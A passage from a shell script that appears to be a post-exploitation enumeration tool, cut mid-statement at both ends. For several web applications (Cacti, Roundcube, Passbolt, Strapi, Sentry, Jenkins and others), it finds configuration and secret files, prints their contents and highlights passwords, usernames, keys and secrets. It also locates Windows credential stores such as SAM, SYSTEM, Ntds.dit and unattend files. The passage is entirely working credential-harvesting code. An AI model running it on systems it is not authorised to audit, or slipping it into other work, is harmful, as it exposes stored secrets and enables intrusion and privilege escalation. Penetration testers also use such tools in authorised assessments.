"s,allow-query|allow-recursion|allow-transfer|zone-statistics|file
.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [ "$PSTORAGE_SEEDDMS" ] ||
[ "$DEBUG" ]; then print_2title "Analyzing SeedDMS Files (limit 70)" if ! [
"`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "seeddms*"; fi; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep
-E "seeddms.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,seeddms.*$,${SED_RED},"; find "$f" -name "settings.xml" | while read ff; do
ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null |
grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g";
done; echo "";done; echo ""; fi if [ "$PSTORAGE_DDCLIENT" ] || [ "$DEBUG" ];
then print_2title "Analyzing Ddclient Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "ddclient.conf"; fi; fi; printf "%s" "$PSTORAGE_DDCLIENT" |
grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,.*password.*,${SED_RED},g"; done; echo ""; fi if [ "$PSTORAGE_SENTRY" ]
|| [ "$DEBUG" ]; then print_2title "Analyzing Sentry Files (limit 70)" if ! [
"`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "sentry"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E
"sentry$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,sentry$,${SED_RED},"; find "$f" -name "config.yml" | while read ff; do ls -ld
"$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv
"^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done;
echo ""; if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "sentry.conf.py"; fi; fi; printf "%s"
"$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null
| grep -IEv "^$" | grep -Ev "^#" | sed -${E}
"s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_STRAPI" ] || [ "$DEBUG" ]; then print_2title "Analyzing Strapi Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "environments"; fi; fi; printf "%s"
"$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,environments$,${SED_RED},"; find "$f" -name
"custom.json" | while read ff; do ls -ld "$ff" | sed -${E}
"s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f"
-name "database.json" | while read ff; do ls -ld "$ff" | sed -${E}
"s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo
"";find "$f" -name "request.json" | while read ff; do ls -ld "$ff" | sed -${E}
"s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f"
-name "response.json" | while read ff; do ls -ld "$ff" | sed -${E}
"s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo
"";find "$f" -name "security.json" | while read ff; do ls -ld "$ff" | sed -${E}
"s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed
-${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo
"";find "$f" -name "server.json" | while read ff; do ls -ld "$ff" | sed -${E}
"s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E}
"s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done;
echo ""; fi if [ "$PSTORAGE_CACTI" ] || [ "$DEBUG" ]; then print_2title
"Analyzing Cacti Files (limit 70)" if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E
\"cacti$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cacti"; fi; fi;
printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,cacti$,${SED_RED},"; find "$f" -name "config.php" |
while read ff; do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff"
2>/dev/null | grep -IEv "^$" | grep -E
"database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl"
| sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g";
done; echo "";find "$f" -name "config.php.dist" | while read ff; do ls -ld "$ff"
| sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv
"^$" | grep -E
"database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl"
| sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g";
done; echo "";find "$f" -name "installer.php" | while read ff; do ls -ld "$ff" |
sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$"
| grep -E
"database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl"
| sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g";
done; echo "";find "$f" -name "check_all_pages" | while read ff; do ls -ld "$ff"
| sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv
"^$" | grep -E
"database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl"
| sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g";
done; echo "";done; echo ""; fi if [ "$PSTORAGE_ROUNDCUBE" ] || [ "$DEBUG" ];
then print_2title "Analyzing Roundcube Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "roundcube"; fi; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E
"roundcube$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,roundcube$,${SED_RED},"; find "$f" -name "config.inc.php" | while read ff; do
ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null |
grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done;
echo "";done; echo ""; fi if [ "$PSTORAGE_PASSBOLT" ] || [ "$DEBUG" ]; then
print_2title "Analyzing Passbolt Files (limit 70)" if ! [ "`echo
\"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "passbolt.php"; fi; fi; printf "%s" "$PSTORAGE_PASSBOLT" |
grep -E "passbolt\.php$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E
"host|port|username|password|database" | grep -Ev "^#" | sed -${E}
"s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_JETTY" ] || [ "$DEBUG" ]; then print_2title "Analyzing Jetty Files
(limit 70)" if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E
\"jetty-realm\.properties$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"jetty-realm.properties"; fi; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E
"jetty-realm\.properties$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv
"^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; fi if [
"$PSTORAGE_JENKINS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Jenkins
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E
\"master\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "master.key";
fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "master\.key$" | while read f;
do ls -ld "$f" 2>/dev/null | sed -${E} "s,master\.key$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if
! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"hudson\.util\.Secret$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "hudson.util.Secret"; fi; fi; printf "%s"
"$PSTORAGE_JENKINS" | grep -E "hudson\.util\.Secret$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,hudson\.util\.Secret$,${SED_RED},"; cat "$f"
2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if
! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"credentials\.xml$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "credentials.xml"; fi; fi; printf "%s"
"$PSTORAGE_JENKINS" | grep -E "credentials\.xml$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,credentials\.xml$,${SED_RED},"; cat "$f" 2>/dev/null
| grep -IEv "^$" | sed -${E} "s,secret.*|password.*,${SED_RED},g"; done; echo
""; if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"config\.xml$\"`" ]; then if
[ "$DEBUG" ]; then echo_not_found "config.xml"; fi; fi; printf "%s"
"$PSTORAGE_JENKINS" | grep -E "config\.xml$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,config\.xml$,${SED_RED},"; cat "$f" 2>/dev/null |
grep -IEv "^$" | grep -E "secret.*|password.*" | sed -${E}
"s,secret.*|password.*,${SED_RED},g"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_JENKINS\" | grep -E \"jenkins$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "*jenkins"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E
"jenkins$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,jenkins$,${SED_RED},"; find "$f" -name "build.xml" | while read ff; do ls -ld
"$ff" | sed -${E} "s,build.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv
"^$" | grep -E "secret.*|password.*" | sed -${E}
"s,secret.*|password.*,${SED_RED},g"; done; echo "";done; echo ""; fi if [
"$PSTORAGE_INTERESTING_LOGS" ] || [ "$DEBUG" ]; then print_2title "Analyzing
Interesting logs Files (limit 70)" if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\"
| grep -E \"access\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"access.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E
"access\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,access\.log$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "error.log"; fi; fi; printf "%s"
"$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; fi if [
"$PSTORAGE_WINDOWS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Windows
Files (limit 70)" if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"\.rdg$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "*.rdg"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "\.rdg$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"AppEvent\.Evt$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "AppEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"autounattend\.xml$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "autounattend.xml"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "autounattend\.xml$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,autounattend\.xml$,${SED_RED},"; done; echo "";
if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ConsoleHost_history\.txt$\"`" ];
then if [ "$DEBUG" ]; then echo_not_found "ConsoleHost_history.txt"; fi; fi;
printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ConsoleHost_history\.txt$" | while
read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "FreeSSHDservice.ini"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo
""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"NetSetup\.log$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_WINDOWS\" | grep -E \"Ntds\.dit$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "Ntds.dit"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep
-E "Ntds\.dit$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,Ntds\.dit$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" |
grep -E \"protecteduserkey\.bin$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "protecteduserkey.bin"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" 2>/dev/null |
sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"SAM$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "SAM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SAM$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,SAM$,${SED_RED},"; done;
echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SYSTEM$\"`" ]; then if
[ "$DEBUG" ]; then echo_not_found "SYSTEM"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "SYSTEM$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"SecEvent\.Evt$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "SecEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"appcmd\.exe$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "appcmd.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"appcmd\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,appcmd\.exe$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\"
| grep -E \"bash\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"bash.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "bash\.exe$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bash\.exe$,${SED_RED},";
done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E
\"datasources\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"datasources.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"datasources\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,datasources\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"default\.sav$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "default.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "default\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,default\.sav$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"drives\.xml$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "drives.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"drives\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,drives\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\"
| grep -E \"groups\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"groups.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "groups\.xml$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,groups\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\"
| grep -E \"https-xampp\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"https-xampp.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"https-xampp\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,https-xampp\.conf$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"https\.conf$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "https.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"https\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,https\.conf$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\"
| grep -E \"iis6\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"iis6.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "iis6\.log$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,iis6\.log$,${SED_RED},";
done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"index\.dat$\"`"
]; then if [ "$DEBUG" ]; then echo_not_found "index.dat"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "index\.dat$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_WINDOWS\" | grep -E \"my\.cnf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "my.cnf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"my\.cnf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,my\.cnf$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" |
grep -E \"my\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.ini";
fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "my\.ini$" | while read f; do
ls -ld "$f" 2>/dev/null | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; if
! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ntuser\.dat$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "ntuser.dat"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_WINDOWS\" | grep -E \"pagefile\.sys$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "pagefile.sys"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_WINDOWS\" | grep -E \"printers\.xml$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "printers.xml"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "printers\.xml$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_WINDOWS\" | grep -E \"recentservers\.xml$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "recentservers\.xml$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo "";
if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scclient\.exe$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "scclient.exe"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scheduledtasks\.xml$\"`" ]; then if [
"$DEBUG" ]; then echo_not_found "scheduledtasks.xml"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld
"$f" 2>/dev/null | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo
""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"security\.sav$\"`" ]; then
if [ "$DEBUG" ]; then echo_not_found "security.sav"; fi; fi; printf "%s"
"$PSTORAGE_WINDOWS" | grep -E "security\.sav$" | while read f; do ls -ld "$f"
2>/dev/null | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; if ! [
"`echo \"$PSTORAGE_WINDOWS\" | grep -E \"server\.xml$\"`" ]; then if [ "$DEBUG"
]; then echo_not_found "server.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "server\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,server\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\"
| grep -E \"setupinfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"setupinfo"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "setupinfo$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,setupinfo$,${SED_RED},";
done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E
\"setupinfo\.bak$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"setupinfo.bak"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"setupinfo\.bak$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,setupinfo\.bak$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"sitemanager\.xml$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "sitemanager.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"sites\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,sites\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\"
| grep -E \"software$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"software"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "software$" |
while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,software$,${SED_RED},";
done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E
\"software\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"software.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"software\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,software\.sav$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.inf$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "sysprep.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,sysprep\.inf$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.xml$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "sysprep.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,sysprep\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"system\.sav$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "system.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"system\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,system\.sav$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\"
| grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found
"unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"unattend\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,unattend\.inf$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.txt$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "unattend.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "unattend\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,unattend\.txt$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.xml$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "unattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "unattend\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,unattend\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"unattended\.xml$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "unattended.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "unattended\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed
-${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ];
then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" |
grep -E "wcx_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
"s,wcx_ftp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo
\"$PSTORAGE_WINDOWS\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then
echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E
"ws_ftp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E}
